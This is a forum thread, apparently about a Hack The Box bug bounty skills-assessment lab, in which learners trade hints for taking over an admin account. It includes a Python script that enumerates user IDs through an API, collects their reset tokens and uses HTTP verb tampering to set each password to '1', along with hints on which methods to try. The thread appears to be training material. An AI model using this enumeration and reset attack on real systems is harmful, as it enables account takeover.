I have found the uid of the Admin user but I can’t change the password. I am getting “Access Denied” message.
1: Find a way to reset your own password
2: Try this for other users as well
3: try other methods with the same content eg PUT/GETGET /reset.php?uid=XX&tokenXX-XX-XX-XX&password=test123
4 Likes
this is my python script
import requests
url_template = 'http://46.101.78.65:31909/api.php/token/{}'
reset_url = 'http://46.101.78.65:31909/reset.php'
get_url_template = 'http://46.101.78.65:31909/api.php/user/{}'
data = {
'uid': '',
'token': '',
'password': '1'
}
for i in range(1, 101):
print('Processing user {}...'.format(i))
# Build the URL to get the token
token_url = url_template.format(i)
# Send GET request to obtain the token
token_response = requests.get(token_url)
# Check the response status code
if token_response.status_code == 200:
# Retrieve the token from the response
token_json_data = token_response.json()
token = token_json_data.get('token')
print('Obtained token:', token)
# Update the token and uid in the request data
data['token'] = token
data['uid'] = str(i)
# Send the second request
response = requests.patch(reset_url + "?uid=" + str(i) + "&token=" + token + "&password=1", data=data)
# Check the response status code
if response.status_code == 200:
# Request successful
print('Second request successful!')
print('Response content:', response.text)
else:
# Request failed
print('Second request failed. Status code:', response.status_code)
# Check if the user is an administrator
get_url = get_url_template.format(i)
get_response = requests.get(get_url)
if get_response.status_code == 200:
print('User information:', get_response.text)
# Check if the response contains the string 'admin', case-insensitive
if 'admin' in get_response.text.lower():
# Contains 'admin', indicating administrative privileges
print('=============================== Potential administrator user found!')
else:
# Request failed
print('Request failed. Status code:', response.status_code)
else:
# Failed to obtain the token
print('Failed to obtain token. Status code:', token_response.status_code)
1 Like
I’ve just completed this skills assessment, for me the most difficult of the entire Bug Bounty path. I must say that without the hints made available in this thread, I would not have been able to complete the challenge. I wonder whether it would not have been better if Hack the Box staff organized the skills assessment with structured hints, which of course do not give us a straightforward answer but also do not make us feel completely lost and forced to peruse threads like this for hours trying to find an answer (I have a full-time job and I cannot dedicate the entirety of my day to complete CTFs, even if I would have been happy if this were the case 
1 Like
I’m stuck for several days trying to reset the “Administrator”'s password. I found all 100 users including the “Administrator” and I have his uid, token, username, full name, and company. I have tried verb tampering by using all http verbs but the response I get was “Access Denied” for POST; “Missing parameters” for GET, DELETE, OPTIONS, PUT and PATCH; just the response header for HEAD; “405 Method Not Allowed” for TRACE; and “400 Bad Request” for CONNECT. Any assistance will be appreciated.
You’re close, certain HTTP methods give you the response “missing parameters”, maybe try supplying some parameters and see what happens
1 Like
Thanks for the reply. I figured it out. Looking back now, it was much easier than I thought. I had all the info I needed, I just needed to apply some of it when verb tampering.
I’ve used Burp Intruder for enumeration of the users, worked fine and didn’t request any extra tools/applications.
Lost some time because if was looking for flag.php instead of /flag.php
You saved me Ronh! Thanks for the assist!
The only problem is getting the right token! Where can I find it?
And should the token be for the admin? Or is it static for all users?